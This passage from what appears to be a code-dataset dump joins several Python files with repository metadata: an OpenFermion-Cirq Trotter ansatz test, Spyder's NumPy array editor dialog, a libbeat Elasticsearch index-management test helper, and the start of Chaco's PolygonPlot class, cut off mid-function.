objective._hamiltonian_linear_op, final_state).real numpy.testing.assert_allclose(obj_val, study_val, atol=atol) numpy.testing.assert_allclose(obj_val, correct_val, atol=atol) @pytest.mark.parametrize( 'ansatz, trotter_algorithm, order, hamiltonian, atol', [ (SwapNetworkTrotterAnsatz(diag_coul_hamiltonian, iterations=2), LINEAR_SWAP_NETWORK, 1, diag_coul_hamiltonian, 5e-5), (SplitOperatorTrotterAnsatz(diag_coul_hamiltonian, iterations=2), SPLIT_OPERATOR, 1, diag_coul_hamiltonian, 5e-5), (LowRankTrotterAnsatz(h2_hamiltonian, iterations=2), LOW_RANK, 0, h2_hamiltonian, 5e-5), (LowRankTrotterAnsatz(lih_hamiltonian, iterations=2, final_rank=3), LowRankTrotterAlgorithm(final_rank=3), 0, lih_hamiltonian, 1e-3), (SwapNetworkTrotterHubbardAnsatz(2, 2, 1.0, 4.0, iterations=2), LINEAR_SWAP_NETWORK, 1, openfermion.get_diagonal_coulomb_hamiltonian( openfermion.reorder( openfermion.fermi_hubbard(2, 2, 1.0, 4.0), openfermion.up_then_down) ), 5e-5) ]) def test_trotter_ansatzes_default_initial_params_iterations_2( ansatz, trotter_algorithm, order, hamiltonian, atol): """Check that a Trotter ansatz with two iterations and default parameters is consistent with time evolution with two Trotter steps.""" objective = HamiltonianObjective(hamiltonian) qubits = ansatz.qubits if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian): one_body = hamiltonian.one_body elif isinstance(hamiltonian, openfermion.InteractionOperator): one_body = hamiltonian.one_body_tensor if isinstance(ansatz, SwapNetworkTrotterHubbardAnsatz): occupied_orbitals = (range(len(qubits)//4), range(len(qubits)//4)) else: occupied_orbitals = range(len(qubits)//2) preparation_circuit = cirq.Circuit( prepare_gaussian_state( qubits, openfermion.QuadraticHamiltonian(one_body), occupied_orbitals=occupied_orbitals ) ) # Compute value using ansatz circuit and objective circuit = cirq.resolve_parameters( preparation_circuit + ansatz.circuit, ansatz.param_resolver(ansatz.default_initial_params())) result = circuit.final_wavefunction( qubit_order=ansatz.qubit_permutation(qubits)) obj_val = objective.value(result) # Compute value using study study = VariationalStudy( 'study', ansatz, objective, preparation_circuit=preparation_circuit) study_val = study.value_of(ansatz.default_initial_params()) # Compute value by simulating time evolution if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian): quarter_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian( one_body=hamiltonian.one_body, two_body=0.25 * hamiltonian.two_body) three_quarters_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian( one_body=hamiltonian.one_body, two_body=0.75 * hamiltonian.two_body) elif isinstance(hamiltonian, openfermion.InteractionOperator): quarter_way_hamiltonian = openfermion.InteractionOperator( constant=hamiltonian.constant, one_body_tensor=hamiltonian.one_body_tensor, two_body_tensor=0.25 * hamiltonian.two_body_tensor) three_quarters_way_hamiltonian = openfermion.InteractionOperator( constant=hamiltonian.constant, one_body_tensor=hamiltonian.one_body_tensor, two_body_tensor=0.75 * hamiltonian.two_body_tensor) simulation_circuit = cirq.Circuit( simulate_trotter( qubits, quarter_way_hamiltonian, time=0.5 * ansatz.adiabatic_evolution_time, n_steps=1, order=order, algorithm=trotter_algorithm), simulate_trotter( qubits, three_quarters_way_hamiltonian, time=0.5 * ansatz.adiabatic_evolution_time, n_steps=1, order=order, algorithm=trotter_algorithm) ) final_state = ( preparation_circuit + simulation_circuit).final_wavefunction() correct_val = openfermion.expectation( objective._hamiltonian_linear_op, final_state).real numpy.testing.assert_allclose(obj_val, study_val, atol=atol) numpy.testing.assert_allclose(obj_val, correct_val, atol=atol)
1.617188
2
spyder/plugins/variableexplorer/widgets/arrayeditor.py
seryj/spyder
0
1831
# -*- coding: utf-8 -*- # # Copyright © Spyder Project Contributors # Licensed under the terms of the MIT License # (see spyder/__init__.py for details) """ NumPy Array Editor Dialog based on Qt """ # pylint: disable=C0103 # pylint: disable=R0903 # pylint: disable=R0911 # pylint: disable=R0201 # Standard library imports from __future__ import print_function # Third party imports from qtpy.compat import from_qvariant, to_qvariant from qtpy.QtCore import (QAbstractTableModel, QItemSelection, QLocale, QItemSelectionRange, QModelIndex, Qt, Slot) from qtpy.QtGui import QColor, QCursor, QDoubleValidator, QKeySequence from qtpy.QtWidgets import (QAbstractItemDelegate, QApplication, QCheckBox, QComboBox, QDialog, QDialogButtonBox, QGridLayout, QHBoxLayout, QInputDialog, QItemDelegate, QLabel, QLineEdit, QMenu, QMessageBox, QPushButton, QSpinBox, QStackedWidget, QTableView, QVBoxLayout, QWidget) import numpy as np # Local imports from spyder.config.base import _ from spyder.config.fonts import DEFAULT_SMALL_DELTA from spyder.config.gui import get_font, config_shortcut from spyder.py3compat import (io, is_binary_string, is_string, is_text_string, PY3, to_binary_string, to_text_string) from spyder.utils import icon_manager as ima from spyder.utils.qthelpers import add_actions, create_action, keybinding # Note: string and unicode data types will be formatted with '%s' (see below) SUPPORTED_FORMATS = { 'single': '%.6g', 'double': '%.6g', 'float_': '%.6g', 'longfloat': '%.6g', 'float16': '%.6g', 'float32': '%.6g', 'float64': '%.6g', 'float96': '%.6g', 'float128': '%.6g', 'csingle': '%r', 'complex_': '%r', 'clongfloat': '%r', 'complex64': '%r', 'complex128': '%r', 'complex192': '%r', 'complex256': '%r', 'byte': '%d', 'bytes8': '%s', 'short': '%d', 'intc': '%d', 'int_': '%d', 'longlong': '%d', 'intp': '%d', 'int8': '%d', 'int16': '%d', 'int32': '%d', 'int64': '%d', 'ubyte': '%d', 'ushort': '%d', 'uintc': '%d', 'uint': '%d', 'ulonglong': '%d', 'uintp': '%d', 'uint8': '%d', 'uint16': '%d', 'uint32': '%d', 'uint64': '%d', 'bool_': '%r', 'bool8': '%r', 'bool': '%r', } LARGE_SIZE = 5e5 LARGE_NROWS = 1e5 LARGE_COLS = 60 #============================================================================== # Utility functions #============================================================================== def is_float(dtype): """Return True if datatype dtype is a float kind""" return ('float' in dtype.name) or dtype.name in ['single', 'double'] def is_number(dtype): """Return True is datatype dtype is a number kind""" return is_float(dtype) or ('int' in dtype.name) or ('long' in dtype.name) \ or ('short' in dtype.name) def get_idx_rect(index_list): """Extract the boundaries from a list of indexes""" rows, cols = list(zip(*[(i.row(), i.column()) for i in index_list])) return ( min(rows), max(rows), min(cols), max(cols) ) #============================================================================== # Main classes #============================================================================== class ArrayModel(QAbstractTableModel): """Array Editor Table Model""" ROWS_TO_LOAD = 500 COLS_TO_LOAD = 40 def __init__(self, data, format="%.6g", xlabels=None, ylabels=None, readonly=False, parent=None): QAbstractTableModel.__init__(self) self.dialog = parent self.changes = {} self.xlabels = xlabels self.ylabels = ylabels self.readonly = readonly self.test_array = np.array([0], dtype=data.dtype) # for complex numbers, shading will be based on absolute value # but for all other types it will be the real part if data.dtype in (np.complex64, np.complex128): self.color_func = np.abs else: self.color_func = np.real # Backgroundcolor settings huerange = [.66, .99] # Hue self.sat = .7 # Saturation self.val = 1. # Value self.alp = .6 # Alpha-channel self._data = data self._format = format self.total_rows = self._data.shape[0] self.total_cols = self._data.shape[1] size = self.total_rows * self.total_cols try: self.vmin = np.nanmin(self.color_func(data)) self.vmax = np.nanmax(self.color_func(data)) if self.vmax == self.vmin: self.vmin -= 1 self.hue0 = huerange[0] self.dhue = huerange[1]-huerange[0] self.bgcolor_enabled = True except (TypeError, ValueError): self.vmin = None self.vmax = None self.hue0 = None self.dhue = None self.bgcolor_enabled = False # Use paging when the total size, number of rows or number of # columns is too large if size > LARGE_SIZE: self.rows_loaded = self.ROWS_TO_LOAD self.cols_loaded = self.COLS_TO_LOAD else: if self.total_rows > LARGE_NROWS: self.rows_loaded = self.ROWS_TO_LOAD else: self.rows_loaded = self.total_rows if self.total_cols > LARGE_COLS: self.cols_loaded = self.COLS_TO_LOAD else: self.cols_loaded = self.total_cols def get_format(self): """Return current format""" # Avoid accessing the private attribute _format from outside return self._format def get_data(self): """Return data""" return self._data def set_format(self, format): """Change display format""" self._format = format self.reset() def columnCount(self, qindex=QModelIndex()): """Array column number""" if self.total_cols <= self.cols_loaded: return self.total_cols else: return self.cols_loaded def rowCount(self, qindex=QModelIndex()): """Array row number""" if self.total_rows <= self.rows_loaded: return self.total_rows else: return self.rows_loaded def can_fetch_more(self, rows=False, columns=False): if rows: if self.total_rows > self.rows_loaded: return True else: return False if columns: if self.total_cols > self.cols_loaded: return True else: return False def fetch_more(self, rows=False, columns=False): if self.can_fetch_more(rows=rows): reminder = self.total_rows - self.rows_loaded items_to_fetch = min(reminder, self.ROWS_TO_LOAD) self.beginInsertRows(QModelIndex(), self.rows_loaded, self.rows_loaded + items_to_fetch - 1) self.rows_loaded += items_to_fetch self.endInsertRows() if self.can_fetch_more(columns=columns): reminder = self.total_cols - self.cols_loaded items_to_fetch = min(reminder, self.COLS_TO_LOAD) self.beginInsertColumns(QModelIndex(), self.cols_loaded, self.cols_loaded + items_to_fetch - 1) self.cols_loaded += items_to_fetch self.endInsertColumns() def bgcolor(self, state): """Toggle backgroundcolor""" self.bgcolor_enabled = state > 0 self.reset() def get_value(self, index): i = index.row() j = index.column() if len(self._data.shape) == 1: value = self._data[j] else: value = self._data[i, j] return self.changes.get((i, j), value) def data(self, index, role=Qt.DisplayRole): """Cell content""" if not index.isValid(): return to_qvariant() value = self.get_value(index) if is_binary_string(value): try: value = to_text_string(value, 'utf8') except: pass if role == Qt.DisplayRole: if value is np.ma.masked: return '' else: try: return to_qvariant(self._format % value) except TypeError: self.readonly = True return repr(value) elif role == Qt.TextAlignmentRole: return to_qvariant(int(Qt.AlignCenter|Qt.AlignVCenter)) elif role == Qt.BackgroundColorRole and self.bgcolor_enabled \ and value is not np.ma.masked: try: hue = (self.hue0 + self.dhue * (float(self.vmax) - self.color_func(value)) / (float(self.vmax) - self.vmin)) hue = float(np.abs(hue)) color = QColor.fromHsvF(hue, self.sat, self.val, self.alp) return to_qvariant(color) except TypeError: return to_qvariant() elif role == Qt.FontRole: return to_qvariant(get_font(font_size_delta=DEFAULT_SMALL_DELTA)) return to_qvariant() def setData(self, index, value, role=Qt.EditRole): """Cell content change""" if not index.isValid() or self.readonly: return False i = index.row() j = index.column() value = from_qvariant(value, str) dtype = self._data.dtype.name if dtype == "bool": try: val = bool(float(value)) except ValueError: val = value.lower() == "true" elif dtype.startswith("string") or dtype.startswith("bytes"): val = to_binary_string(value, 'utf8') elif dtype.startswith("unicode") or dtype.startswith("str"): val = to_text_string(value) else: if value.lower().startswith('e') or value.lower().endswith('e'): return False try: val = complex(value) if not val.imag: val = val.real except ValueError as e: QMessageBox.critical(self.dialog, "Error", "Value error: %s" % str(e)) return False try: self.test_array[0] = val # will raise an Exception eventually except OverflowError as e: print("OverflowError: " + str(e)) # spyder: test-skip QMessageBox.critical(self.dialog, "Error", "Overflow error: %s" % str(e)) return False # Add change to self.changes self.changes[(i, j)] = val self.dataChanged.emit(index, index) if not is_string(val): if val > self.vmax: self.vmax = val if val < self.vmin: self.vmin = val return True def flags(self, index): """Set editable flag""" if not index.isValid(): return Qt.ItemIsEnabled return Qt.ItemFlags(QAbstractTableModel.flags(self, index)| Qt.ItemIsEditable) def headerData(self, section, orientation, role=Qt.DisplayRole): """Set header data""" if role != Qt.DisplayRole: return to_qvariant() labels = self.xlabels if orientation == Qt.Horizontal else self.ylabels if labels is None: return to_qvariant(int(section)) else: return to_qvariant(labels[section]) def reset(self): self.beginResetModel() self.endResetModel() class ArrayDelegate(QItemDelegate): """Array Editor Item Delegate""" def __init__(self, dtype, parent=None): QItemDelegate.__init__(self, parent) self.dtype = dtype def createEditor(self, parent, option, index): """Create editor widget""" model = index.model() value = model.get_value(index) if model._data.dtype.name == "bool": value = not value model.setData(index, to_qvariant(value)) return elif value is not np.ma.masked: editor = QLineEdit(parent) editor.setFont(get_font(font_size_delta=DEFAULT_SMALL_DELTA)) editor.setAlignment(Qt.AlignCenter) if is_number(self.dtype): validator = QDoubleValidator(editor) validator.setLocale(QLocale('C')) editor.setValidator(validator) editor.returnPressed.connect(self.commitAndCloseEditor) return editor def commitAndCloseEditor(self): """Commit and close editor""" editor = self.sender() # Avoid a segfault with PyQt5. Variable value won't be changed # but at least Spyder won't crash. It seems generated by a bug in sip. try: self.commitData.emit(editor) except AttributeError: pass self.closeEditor.emit(editor, QAbstractItemDelegate.NoHint) def setEditorData(self, editor, index): """Set editor widget's data""" text = from_qvariant(index.model().data(index, Qt.DisplayRole), str) editor.setText(text) #TODO: Implement "Paste" (from clipboard) feature class ArrayView(QTableView): """Array view class""" def __init__(self, parent, model, dtype, shape): QTableView.__init__(self, parent) self.setModel(model) self.setItemDelegate(ArrayDelegate(dtype, self)) total_width = 0 for k in range(shape[1]): total_width += self.columnWidth(k) self.viewport().resize(min(total_width, 1024), self.height()) self.shape = shape self.menu = self.setup_menu() config_shortcut(self.copy, context='variable_explorer', name='copy', parent=self) self.horizontalScrollBar().valueChanged.connect( lambda val: self.load_more_data(val, columns=True)) self.verticalScrollBar().valueChanged.connect( lambda val: self.load_more_data(val, rows=True)) def load_more_data(self, value, rows=False, columns=False): try: old_selection = self.selectionModel().selection() old_rows_loaded = old_cols_loaded = None if rows and value == self.verticalScrollBar().maximum(): old_rows_loaded = self.model().rows_loaded self.model().fetch_more(rows=rows) if columns and value == self.horizontalScrollBar().maximum(): old_cols_loaded = self.model().cols_loaded self.model().fetch_more(columns=columns) if old_rows_loaded is not None or old_cols_loaded is not None: # if we've changed anything, update selection new_selection = QItemSelection() for part in old_selection: top = part.top() bottom = part.bottom() if (old_rows_loaded is not None and top == 0 and bottom == (old_rows_loaded-1)): # complete column selected (so expand it to match # updated range) bottom = self.model().rows_loaded-1 left = part.left() right = part.right() if (old_cols_loaded is not None and left == 0 and right == (old_cols_loaded-1)): # compete row selected (so expand it to match updated # range) right = self.model().cols_loaded-1 top_left = self.model().index(top, left) bottom_right = self.model().index(bottom, right) part = QItemSelectionRange(top_left, bottom_right) new_selection.append(part) self.selectionModel().select (new_selection, self.selectionModel().ClearAndSelect) except NameError: # Needed to handle a NameError while fetching data when closing # See isue 7880 pass def resize_to_contents(self): """Resize cells to contents""" QApplication.setOverrideCursor(QCursor(Qt.WaitCursor)) self.resizeColumnsToContents() self.model().fetch_more(columns=True) self.resizeColumnsToContents() QApplication.restoreOverrideCursor() def setup_menu(self): """Setup context menu""" self.copy_action = create_action(self, _('Copy'), shortcut=keybinding('Copy'), icon=ima.icon('editcopy'), triggered=self.copy, context=Qt.WidgetShortcut) menu = QMenu(self) add_actions(menu, [self.copy_action, ]) return menu def contextMenuEvent(self, event): """Reimplement Qt method""" self.menu.popup(event.globalPos()) event.accept() def keyPressEvent(self, event): """Reimplement Qt method""" if event == QKeySequence.Copy: self.copy() else: QTableView.keyPressEvent(self, event) def _sel_to_text(self, cell_range): """Copy an array portion to a unicode string""" if not cell_range: return row_min, row_max, col_min, col_max = get_idx_rect(cell_range) if col_min == 0 and col_max == (self.model().cols_loaded-1): # we've selected a whole column. It isn't possible to # select only the first part of a column without loading more, # so we can treat it as intentional and copy the whole thing col_max = self.model().total_cols-1 if row_min == 0 and row_max == (self.model().rows_loaded-1): row_max = self.model().total_rows-1 _data = self.model().get_data() if PY3: output = io.BytesIO() else: output = io.StringIO() try: np.savetxt(output, _data[row_min:row_max+1, col_min:col_max+1], delimiter='\t', fmt=self.model().get_format()) except: QMessageBox.warning(self, _("Warning"), _("It was not possible to copy values for " "this array")) return contents = output.getvalue().decode('utf-8') output.close() return contents @Slot() def copy(self): """Copy text to clipboard""" cliptxt = self._sel_to_text( self.selectedIndexes() ) clipboard = QApplication.clipboard() clipboard.setText(cliptxt) class ArrayEditorWidget(QWidget): def __init__(self, parent, data, readonly=False, xlabels=None, ylabels=None): QWidget.__init__(self, parent) self.data = data self.old_data_shape = None if len(self.data.shape) == 1: self.old_data_shape = self.data.shape self.data.shape = (self.data.shape[0], 1) elif len(self.data.shape) == 0: self.old_data_shape = self.data.shape self.data.shape = (1, 1) format = SUPPORTED_FORMATS.get(data.dtype.name, '%s') self.model = ArrayModel(self.data, format=format, xlabels=xlabels, ylabels=ylabels, readonly=readonly, parent=self) self.view = ArrayView(self, self.model, data.dtype, data.shape) btn_layout = QHBoxLayout() btn_layout.setAlignment(Qt.AlignLeft) btn = QPushButton(_( "Format")) # disable format button for int type btn.setEnabled(is_float(data.dtype)) btn_layout.addWidget(btn) btn.clicked.connect(self.change_format) btn = QPushButton(_( "Resize")) btn_layout.addWidget(btn) btn.clicked.connect(self.view.resize_to_contents) bgcolor = QCheckBox(_( 'Background color')) bgcolor.setChecked(self.model.bgcolor_enabled) bgcolor.setEnabled(self.model.bgcolor_enabled) bgcolor.stateChanged.connect(self.model.bgcolor) btn_layout.addWidget(bgcolor) layout = QVBoxLayout() layout.addWidget(self.view) layout.addLayout(btn_layout) self.setLayout(layout) def accept_changes(self): """Accept changes""" for (i, j), value in list(self.model.changes.items()): self.data[i, j] = value if self.old_data_shape is not None: self.data.shape = self.old_data_shape def reject_changes(self): """Reject changes""" if self.old_data_shape is not None: self.data.shape = self.old_data_shape def change_format(self): """Change display format""" format, valid = QInputDialog.getText(self, _( 'Format'), _( "Float formatting"), QLineEdit.Normal, self.model.get_format()) if valid: format = str(format) try: format % 1.1 except: QMessageBox.critical(self, _("Error"), _("Format (%s) is incorrect") % format) return self.model.set_format(format) class ArrayEditor(QDialog): """Array Editor Dialog""" def __init__(self, parent=None): QDialog.__init__(self, parent) # Destroying the C++ object right after closing the dialog box, # otherwise it may be garbage-collected in another QThread # (e.g. the editor's analysis thread in Spyder), thus leading to # a segmentation fault on UNIX or an application crash on Windows self.setAttribute(Qt.WA_DeleteOnClose) self.data = None self.arraywidget = None self.stack = None self.layout = None self.btn_save_and_close = None self.btn_close = None # Values for 3d array editor self.dim_indexes = [{}, {}, {}] self.last_dim = 0 # Adjust this for changing the startup dimension def setup_and_check(self, data, title='', readonly=False, xlabels=None, ylabels=None): """ Setup ArrayEditor: return False if data is not supported, True otherwise """ self.data = data readonly = readonly or not self.data.flags.writeable is_record_array = data.dtype.names is not None is_masked_array = isinstance(data, np.ma.MaskedArray) if data.ndim > 3: self.error(_("Arrays with more than 3 dimensions are not " "supported")) return False if xlabels is not None and len(xlabels) != self.data.shape[1]: self.error(_("The 'xlabels' argument length do no match array " "column number")) return False if ylabels is not None and len(ylabels) != self.data.shape[0]: self.error(_("The 'ylabels' argument length do no match array row " "number")) return False if not is_record_array: dtn = data.dtype.name if dtn not in SUPPORTED_FORMATS and not dtn.startswith('str') \ and not dtn.startswith('unicode'): arr = _("%s arrays") % data.dtype.name self.error(_("%s are currently not supported") % arr) return False self.layout = QGridLayout() self.setLayout(self.layout) self.setWindowIcon(ima.icon('arredit')) if title: title = to_text_string(title) + " - " + _("NumPy array") else: title = _("Array editor") if readonly: title += ' (' + _('read only') + ')' self.setWindowTitle(title) self.resize(600, 500) # Stack widget self.stack = QStackedWidget(self) if is_record_array: for name in data.dtype.names: self.stack.addWidget(ArrayEditorWidget(self, data[name], readonly, xlabels, ylabels)) elif is_masked_array: self.stack.addWidget(ArrayEditorWidget(self, data, readonly, xlabels, ylabels)) self.stack.addWidget(ArrayEditorWidget(self, data.data, readonly, xlabels, ylabels)) self.stack.addWidget(ArrayEditorWidget(self, data.mask, readonly, xlabels, ylabels)) elif data.ndim == 3: pass else: self.stack.addWidget(ArrayEditorWidget(self, data, readonly, xlabels, ylabels)) self.arraywidget = self.stack.currentWidget() if self.arraywidget: self.arraywidget.model.dataChanged.connect( self.save_and_close_enable) self.stack.currentChanged.connect(self.current_widget_changed) self.layout.addWidget(self.stack, 1, 0) # Buttons configuration btn_layout = QHBoxLayout() if is_record_array or is_masked_array or data.ndim == 3: if is_record_array: btn_layout.addWidget(QLabel(_("Record array fields:"))) names = [] for name in data.dtype.names: field = data.dtype.fields[name] text = name if len(field) >= 3: title = field[2] if not is_text_string(title): title = repr(title) text += ' - '+title names.append(text) else: names = [_('Masked data'), _('Data'), _('Mask')] if data.ndim == 3: # QSpinBox self.index_spin = QSpinBox(self, keyboardTracking=False) self.index_spin.valueChanged.connect(self.change_active_widget) # QComboBox names = [str(i) for i in range(3)] ra_combo = QComboBox(self) ra_combo.addItems(names) ra_combo.currentIndexChanged.connect(self.current_dim_changed) # Adding the widgets to layout label = QLabel(_("Axis:")) btn_layout.addWidget(label) btn_layout.addWidget(ra_combo) self.shape_label = QLabel() btn_layout.addWidget(self.shape_label) label = QLabel(_("Index:")) btn_layout.addWidget(label) btn_layout.addWidget(self.index_spin) self.slicing_label = QLabel() btn_layout.addWidget(self.slicing_label) # set the widget to display when launched self.current_dim_changed(self.last_dim) else: ra_combo = QComboBox(self) ra_combo.currentIndexChanged.connect(self.stack.setCurrentIndex) ra_combo.addItems(names) btn_layout.addWidget(ra_combo) if is_masked_array: label = QLabel(_("<u>Warning</u>: changes are applied separately")) label.setToolTip(_("For performance reasons, changes applied "\ "to masked array won't be reflected in "\ "array's data (and vice-versa).")) btn_layout.addWidget(label) btn_layout.addStretch() if not readonly: self.btn_save_and_close = QPushButton(_('Save and Close')) self.btn_save_and_close.setDisabled(True) self.btn_save_and_close.clicked.connect(self.accept) btn_layout.addWidget(self.btn_save_and_close) self.btn_close = QPushButton(_('Close')) self.btn_close.setAutoDefault(True) self.btn_close.setDefault(True) self.btn_close.clicked.connect(self.reject) btn_layout.addWidget(self.btn_close) self.layout.addLayout(btn_layout, 2, 0) self.setMinimumSize(400, 300) # Make the dialog act as a window self.setWindowFlags(Qt.Window) return True @Slot(QModelIndex, QModelIndex) def save_and_close_enable(self, left_top, bottom_right): """Handle the data change event to enable the save and close button.""" if self.btn_save_and_close: self.btn_save_and_close.setEnabled(True) self.btn_save_and_close.setAutoDefault(True) self.btn_save_and_close.setDefault(True) def current_widget_changed(self, index): self.arraywidget = self.stack.widget(index) self.arraywidget.model.dataChanged.connect(self.save_and_close_enable) def change_active_widget(self, index): """ This is implemented for handling negative values in index for 3d arrays, to give the same behavior as slicing """ string_index = [':']*3 string_index[self.last_dim] = '<font color=red>%i</font>' self.slicing_label.setText((r"Slicing: [" + ", ".join(string_index) + "]") % index) if index < 0: data_index = self.data.shape[self.last_dim] + index else: data_index = index slice_index = [slice(None)]*3 slice_index[self.last_dim] = data_index stack_index = self.dim_indexes[self.last_dim].get(data_index) if stack_index is None: stack_index = self.stack.count() try: self.stack.addWidget(ArrayEditorWidget( self, self.data[tuple(slice_index)])) except IndexError: # Handle arrays of size 0 in one axis self.stack.addWidget(ArrayEditorWidget(self, self.data)) self.dim_indexes[self.last_dim][data_index] = stack_index self.stack.update() self.stack.setCurrentIndex(stack_index) def current_dim_changed(self, index): """ This change the active axis the array editor is plotting over in 3D """ self.last_dim = index string_size = ['%i']*3 string_size[index] = '<font color=red>%i</font>' self.shape_label.setText(('Shape: (' + ', '.join(string_size) + ') ') % self.data.shape) if self.index_spin.value() != 0: self.index_spin.setValue(0) else: # this is done since if the value is currently 0 it does not emit # currentIndexChanged(int) self.change_active_widget(0) self.index_spin.setRange(-self.data.shape[index], self.data.shape[index]-1) @Slot() def accept(self): """Reimplement Qt method""" for index in range(self.stack.count()): self.stack.widget(index).accept_changes() QDialog.accept(self) def get_value(self): """Return modified array -- this is *not* a copy""" # It is import to avoid accessing Qt C++ object as it has probably # already been destroyed, due to the Qt.WA_DeleteOnClose attribute return self.data def error(self, message): """An error occured, closing the dialog box""" QMessageBox.critical(self, _("Array editor"), message) self.setAttribute(Qt.WA_DeleteOnClose) self.reject() @Slot() def reject(self): """Reimplement Qt method""" if self.arraywidget is not None: for index in range(self.stack.count()): self.stack.widget(index).reject_changes() QDialog.reject(self)
1.796875
2
libbeat/tests/system/idxmgmt.py
dddpaul/beats
4
1832
<filename>libbeat/tests/system/idxmgmt.py<gh_stars>1-10 import datetime import unittest import pytest from elasticsearch import NotFoundError class IdxMgmt(unittest.TestCase): def __init__(self, client, index): self._client = client self._index = index if index != '' and index != '*' else 'mockbeat' def needs_init(self, s): return s == '' or s == '*' def delete(self, indices=[], policies=[]): indices = list([x for x in indices if x != '']) if not indices: indices == [self._index] for i in indices: self.delete_index_and_alias(i) self.delete_template(template=i) for i in [x for x in policies if x != '']: self.delete_policy(i) def delete_index_and_alias(self, index=""): if self.needs_init(index): index = self._index try: self._client.transport.perform_request('DELETE', "/" + index + "*") except NotFoundError: pass def delete_template(self, template=""): if self.needs_init(template): template = self._index try: self._client.transport.perform_request('DELETE', "/_template/" + template + "*") except NotFoundError: pass def delete_policy(self, policy): # Delete any existing policy starting with given policy policies = self._client.transport.perform_request('GET', "/_ilm/policy") for p, _ in policies.items(): if not p.startswith(policy): continue try: self._client.transport.perform_request('DELETE', "/_ilm/policy/" + p) except NotFoundError: pass def assert_index_template_not_loaded(self, template): with pytest.raises(NotFoundError): self._client.transport.perform_request('GET', '/_template/' + template) def assert_index_template_loaded(self, template): resp = self._client.transport.perform_request('GET', '/_template/' + template) assert template in resp assert "lifecycle" not in resp[template]["settings"]["index"] def assert_ilm_template_loaded(self, template, policy, alias): resp = self._client.transport.perform_request('GET', '/_template/' + template) assert resp[template]["settings"]["index"]["lifecycle"]["name"] == policy assert resp[template]["settings"]["index"]["lifecycle"]["rollover_alias"] == alias def assert_index_template_index_pattern(self, template, index_pattern): resp = self._client.transport.perform_request('GET', '/_template/' + template) assert template in resp assert resp[template]["index_patterns"] == index_pattern def assert_alias_not_created(self, alias): resp = self._client.transport.perform_request('GET', '/_alias') for name, entry in resp.items(): if alias not in name: continue assert entry["aliases"] == {}, entry["aliases"] def assert_alias_created(self, alias, pattern=None): if pattern is None: pattern = self.default_pattern() name = alias + "-" + pattern resp = self._client.transport.perform_request('GET', '/_alias/' + alias) assert name in resp assert resp[name]["aliases"][alias]["is_write_index"] == True def assert_policy_not_created(self, policy): with pytest.raises(NotFoundError): self._client.transport.perform_request('GET', '/_ilm/policy/' + policy) def assert_policy_created(self, policy): resp = self._client.transport.perform_request('GET', '/_ilm/policy/' + policy) assert policy in resp assert resp[policy]["policy"]["phases"]["hot"]["actions"]["rollover"]["max_size"] == "50gb" assert resp[policy]["policy"]["phases"]["hot"]["actions"]["rollover"]["max_age"] == "30d" def assert_docs_written_to_alias(self, alias, pattern=None): # Refresh the indices to guarantee all documents are available # through the _search API. self._client.transport.perform_request('POST', '/_refresh') if pattern is None: pattern = self.default_pattern() name = alias + "-" + pattern data = self._client.transport.perform_request('GET', '/' + name + '/_search') self.assertGreater(data["hits"]["total"]["value"], 0) def default_pattern(self): d = datetime.datetime.now().strftime("%Y.%m.%d") return d + "-000001" def index_for(self, alias, pattern=None): if pattern is None: pattern = self.default_pattern() return "{}-{}".format(alias, pattern)
2.234375
2
chaco/polygon_plot.py
burnpanck/chaco
3
1833
""" Defines the PolygonPlot class. """ from __future__ import with_statement # Major library imports import numpy as np # Enthought library imports. from enable.api import LineStyle, black_color_trait, \ transparent_color_trait from kiva.agg import points_in_polygon from traits.api import Enum, Float, Tuple, Property, cached_property, \ on_trait_change # Local imports. from base_xy_plot import BaseXYPlot class PolygonPlot(BaseXYPlot): """ Plots a polygon in dataspace. Assuming that the index and value mappers are linear mappers, and that "index" corresponds to X-coordinates and "value" corresponds to Y-coordinates, the points are arranged in a counter-clockwise fashion. The polygon is closed automatically, so there is no need to reproduce the first point as the last point. Nonlinear mappers are possible, but the results may be unexpected. Only the data-space points are mapped in a nonlinear fashion. Straight lines connecting them in a linear screen-space become curved in a nonlinear screen-space; however, the drawing still contains straight lines in screen-space. If you don't want the edge of the polygon to be drawn, set **edge_color** to transparent; don't try to do this by setting **edge_width** to 0. In some drawing systems, such as PostScript, a line width of 0 means to make the line as small as possible while still putting ink on the page. """ # The color of the line on the edge of the polygon. edge_color = black_color_trait # The thickness of the edge of the polygon. edge_width = Float(1.0) # The line dash style for the edge of the polygon. edge_style = LineStyle # The color of the face of the polygon. face_color = transparent_color_trait # Override the hittest_type trait inherited from BaseXYPlot hittest_type = Enum("poly", "point", "line") # The RGBA tuple for rendering edges. It is always a tuple of length 4. # It has the same RGB values as edge_color_, and its alpha value is the # alpha value of self.edge_color multiplied by self.alpha. effective_edge_color = Property(Tuple, depends_on=['edge_color', 'alpha']) # The RGBA tuple for rendering the face. It is always a tuple of length 4. # It has the same RGB values as face_color_, and its alpha value is the # alpha value of self.face_color multiplied by self.alpha. effective_face_color = Property(Tuple, depends_on=['face_color', 'alpha']) #---------------------------------------------------------------------- # Private 'BaseXYPlot' interface #---------------------------------------------------------------------- def _gather_points(self): """ Collects the data points that are within the bounds of the plot and caches them. """ if self._cache_valid: return index = self.index.get_data() value = self.value.get_data() if not self.index or not self.value: return if len(index) == 0 or len(value) == 0 or len(index) != len(value): self._cached_data_pts = [] self._cache_valid = True return points = np.transpose(np.array((index,value))) self._cached_data_pts = points self._cache_valid = True def _render(self, gc, points): """ Renders an Nx2 array of screen-space points as a polygon. """ with gc: gc.clip_to_rect(self.x, self.y, self.width, self.height) gc.set_stroke_color(self.effective_edge_color) gc.set_line_width(self.edge_width) gc.set_line_dash(self.edge_style_) gc.set_fill_color(self.effective_face_color) gc.lines(points) gc.close_path() gc.draw_path() def _render_icon(self, gc, x, y, width, height): """ Renders a representation of this plot as an icon into the box defined by the parameters. Used by the legend. """ with gc: gc.set_stroke_color(self.effective_edge_color) gc.set_line_width(self.edge_width) gc.set_fill_color(self.effective_face_color) if hasattr(self, 'line_style_'): gc.set_line_dash(self.line_style_) gc.draw_rect((x,y,width,height)) return def hittest(self, screen_pt, threshold=7.0, return_distance=False): """ Performs point-in-polygon testing or point/line proximity testing. If self.hittest_type is "line" or "point", then behaves like the parent class BaseXYPlot.hittest(). If self.hittest_type is "poly", then returns True if the given point is inside the polygon, and False otherwise. """ if self.hittest_type in ("line", "point"): return 